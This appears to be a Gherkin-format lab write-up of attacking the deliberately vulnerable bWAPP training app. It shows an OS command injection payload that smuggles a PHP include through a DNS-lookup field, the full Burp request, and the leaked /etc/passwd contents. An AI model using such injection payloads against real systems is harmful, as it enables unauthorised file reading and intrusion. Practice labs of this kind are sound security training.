# language: en

Feature: Local File Inclusion
  From system bWAPP
  From the A7 - Missing Functional Level Access Control
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given a description of the vulnerability + input form
  """
  URL: http://localhost/bWAPP/commandi.php
  Message: OS command injection
  Input form:
        - Label: DNS Lookup
        - On input: www.nsa.gov
  Objective: Perform an Local File Inclusion
  """

Scenario: Local File Inclusion alternative
  Given the vulnerable form
  And the fact that I already know it's vulnerable to OS injection
  """

  """
  Then I assume an scenario, where the native commands are restricted
  And the user www-data doens't have access to all of them
  But I got an option, use php to list files from console
  """
  # Burp Request on commandi.php
  # Injection string: 127.0.0.1|php include('../../../../../../../etc/passwd');
  POST /bWAPP/commandi.php HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://192.168.56.101/bWAPP/commandi.php

  target=127.0.0.1%7C+php+-r+%27include%28%22..%2F..%2F..%2F..%2F..%2F..\
  %2F..%2Fetc%2Fpasswd%22%29%3B%27&form=submit
  """
  Then I got at response the content of the file
  """
  # Burp Response
  <p align="left">root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  man:x:6:12:man:/var/cache/man:/bin/sh
  lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  mail:x:8:8:mail:/var/mail:/bin/sh
  news:x:9:9:news:/var/spool/news:/bin/sh
  uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  proxy:x:13:13:proxy:/bin:/bin/sh
  www-data:x:33:33:www-data:/var/www:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh

  # Although this is possible using OS injection, we are just doing
  # on other way, using php functions
  """
